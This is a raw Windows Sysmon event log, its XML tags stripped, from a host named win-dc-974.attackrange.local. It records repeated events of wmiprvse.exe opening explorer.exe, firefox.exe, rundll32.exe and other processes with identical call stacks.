16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.474{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.474{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.473{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.472{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.472{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.471{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.470{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.470{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.468{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.468{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.467{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.467{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 